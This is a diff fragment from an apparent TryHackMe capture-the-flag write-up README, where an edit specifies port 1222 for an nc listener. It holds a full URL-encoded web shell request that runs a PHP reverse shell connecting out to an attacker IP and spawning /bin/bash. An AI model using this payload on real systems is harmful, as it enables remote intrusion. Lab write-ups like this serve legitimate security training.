zinzloun/THM_WriteUP/README.md

     www-data

-At this point we can get a shell using the same payload we used before (remember to start a nc listener on the attacker machine=
+At this point we can get a shell using the same payload we used before (remember to start a nc listener on the attacker machine on port 1222

      http://192.168.100.1:8080/ws.php?c=php%20-r%20%27%24sock%3Dfsockopen%28%2210.50.74.35%22%2C1222%29%3Bexec%28%22%2Fbin%2Fbash%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27